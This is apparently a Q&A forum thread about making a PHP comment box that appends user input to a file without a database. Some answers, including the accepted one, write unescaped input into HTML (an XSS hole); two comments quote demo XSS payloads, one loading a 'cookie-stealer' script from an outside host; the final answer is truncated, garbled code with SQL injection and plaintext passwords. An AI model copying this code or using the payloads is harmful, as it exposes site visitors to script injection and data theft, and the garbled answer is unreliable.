# How to create comment box in PHP without database?

Tags: php, comments

I'm a noob trying to get some functionalities done on a website. Unfortunately, I have very little authorization, so I would like to create a comment box as simply as possible without the use of databases or jQuery, JavaScript.

I did a lot of searches and I believe the easiest way is to create a log-like HTML with a comment form, to which the PHP script would append the entered text. This is what I've managed to fabricate so far:

```
$file = "updates.html";
$fh = fopen($file, 'a');
$file = "updates.html";
$fh = fopen($file, 'a');
$comment = echo $_POST["update"] \n";
fwrite($fh, $comment);
fclose($fh);
```

The updates.html file has a comment box of which action points at a php file with the content above. Of course, it doesn't work, there is a parsing error, but I have no idea how to use the variable there (if that's the cause of the problem). I just can't figure out how to do it... Do you have any suggestions? Thanks!

Comment: concatenate this, `echo $_POST["update"]. "\n";` but i'm not understanding what you are trying to do.

Comment: Why would you implement such a hack - surely better to get the correct authorisation?

Comment: You can't do an `echo` and a variable in one go - do them separately.

Comment: *I love this blog post! It's great! <script type="text/javascript" src=" http://www.malicious-scripts.com/cookie-stealer.js "></script>*

Comment: do you have to show the comments right there?  why not simply mail() them to yourself?

Answer (score 2, accepted):

don't know what you would like to do ....

```
 <?php
  if(isset($_POST['update'])) {
     // if a request update exists
     $file = "updates.html";
     file_put_contents($file, $_POST['update']."\n",FILE_APPEND);
  }
  ?>
```

Comment: Basically I just want a plain website where you can leave comments. Like a blog post without the post, only comments.

Comment: Every of these solutions are insecure. What if I post "`<script>document.location.href='http://mysite.com';</script>`? Or any other JS? It's XSS vulnerablities

Answer (score 2):

You opened your file twice.
You don't need to echo your $_POST['update]

```
<?php 
$file = "updates.html"; 
$fh = fopen($file, 'a'); 
$comment = $_POST["update"] . "\n"; 
fwrite($fh, $comment); 
fclose($fh); 
?>
```

Comment: Thanks, there is no parsing error now, but now it doesn't display the content of the file. :(

Comment: use `echo file_get_contents("updates.html");` or check my answer.

Comment: I forgot to write it down it isn't save.

Comment: Thanks, I'm aware of the safety, but only a few chosen people will be able to access the website :)

Comment: @Robert: Almost working with the echo now. The only problem now is that it displays the latest comment only and doesn't append it to previous ones...

Answer (score 1):

*This answer is for anyone who may have a similar question in future.*

In as much as adding comment without a database is impractical it is doable. Below is how you can go about it.

Step 1: Create a file and save it with the .php extension like comment.php
Step 2. create the usual html form and set the form method = "post" and form action to the name of the file like action = "comment.php"

```
<h3> Add a comment here </h3>

<form action="comment.php" method="post">
<label for="name">Name:</label>
<input type="text" name="yourname"><br>
<label for="name">Comment:</label> 
<textarea name="comment" id="comment" cols="30" rows="10"></textarea>
<input type="submit" value="submit">
</form>
```

`
Step 3. 
Write a php script within the same file comment.php to process the data from the form. Remember to enclose the script in the php tag

```
<?php

$yourname = $_POST['yourname'];
$comment = $_POST['comment'];

// format the comment data into how you want it to be displayed on the page
$data = $yourname . "<br>" . $comment . "<br><br>";

//Open a text file for writing and save it in a variable of your chosen.    
//Remember to use "a" not "w" to indicate write. Using 'w' will overwrite 
// any existing item in the file whenever a new item is written to it.

$myfile = fopen("comment.txt", "a"); 

//write the formatted data into the opened file and close it
fwrite($myfile, $data); 
fclose($myfile);

// Reopen the file for reading, echo the content and close the file
$myfile = fopen("comment.txt", "r");
echo fread($myfile,filesize("comment.txt")); 

?>
```

Answer (score 0):

Puting it in file may cause problem because you need some kind of delimiter, you could encode it with base64 and append \n in the end of an entry

```
 $input = base64_encode(htmlspecialchars($_POST['update'])); //consider using strip_tags as well to avoid injections

 file_put_contents("updates.html", $input."\n");
```

to get entries use

```
 $entires = file("updates.html");
 if(count($entries) > 0)
 {
  foreach($entries as $entry)
  {
   echo base64_decode($entry);
  }
 }
 else
 {
   echo 'no entries so far';
 }
```

You should consider using at least **SimpleXml** if you don't want to use Db.

Comment: Umm.. Why would you use `base64_encode`? **Edit**: Ah, It's so every entry will be one line?

Comment: Why? Beacuse in that way string will be converted to base64 and there will be no problem in splitting it with file() function. Check the code that I've posted.

Comment: Warning: Invalid argument supplied for foreach() on line 8 :(

Comment: Because you have no entries in update.html I've edited code to show message when there is such situation.

Answer (score 0):

Required Field

```
"; } else { $v_firstname = ""; } if ($lastname=="") { $v_lastname= "Required Field
"; } else { $v_lastname= ""; } if ($password=="") { $v_password= "Required Field
"; } else { $v_password= ""; } if ($password!=$passwordRetype) { $v_passwordRetype= "Password did not match!
"; } else { $v_passwordRetype= ""; } if ($gender=="") { $v_gender= "Required Field
"; } else { $v_gender= ""; } if ($student_id=="") { $v_student_id= "Required Field
"; } else { $v_student_id= ""; } if ($firstname!="" && $lastname!= "" && $password == $passwordRetype && $student_id!= "" && $email!= "" && $gender!= ""){ $checkme=mysql_query("SELECT * FROM members WHERE student_id = '$student_id'") or die(mysql_error()); $checkmyid=mysql_numrows($checkme); if($checkmyid > 0){ header("location:checkid.php"); }else{ mysql_query("INSERT INTO members (firstname, lastname, password,url, gender, student_id, status_id,photo,account_status) VALUES ('$firstname','$lastname','$password','$email','$gender','$student_id','0','default.jpg','0')")or die(mysql_error()); $wewness = mysql_query("SELECT * FROM members WHERE student_id = $student_id")or die(mysql_error()); $getid = mysql_fetch_array($wewness); $_SESSION['member_id'] = $getid['memberid']; $_SESSION['login'] = 'true'; $_SESSION['studentid'] = $student_id; header("location:registerexec.php"); } } } if(isset($_POST['login'])){ $studentid = $_POST['studid']; $pass = $_POST['password']; $query2 = mysql_query("SELECT * FROM members WHERE student_id = '$studentid' AND password = '$pass' ") or die (mysql_error()); while($studid = mysql_fetch_object($query2)) { echo "$studid->member_id"; } $numberOfRows = MYSQL_NUMROWS($query2); if ($numberOfRows == 0) { } else if ($numberOfRows > 0){ $wewness = mysql_query("SELECT * FROM members WHERE student_id = $studentid")or die(mysql_error()); $getid = mysql_fetch_array($wewness); if($getid['account_status']==0){ $_SESSION['login'] = 'maybe'; $_SESSION['member_id'] = $getid['member_id']; $_SESSION['studentid'] = $getid['student_id']; header('location:registerexec.php'); }elseif($getid['account_status']==2){ $_SESSION['login'] = 'true'; $_SESSION['member_id'] = $getid['member_id']; $_SESSION['studentid'] = $getid['student_id']; header('location:hometest.php'); }elseif($getid['account_status']==1){ $_SESSION['login'] = 'maybe'; $_SESSION['member_id'] = $getid['member_id']; $_SESSION['studentid'] = $getid['student_id']; header('location:fill.php'); } } } ?>
```

by glen

Comment: Please edit your answer and format the code to make it readable.

Comment: Also, try to explain a little about your answer - posting only code is disregarded by many.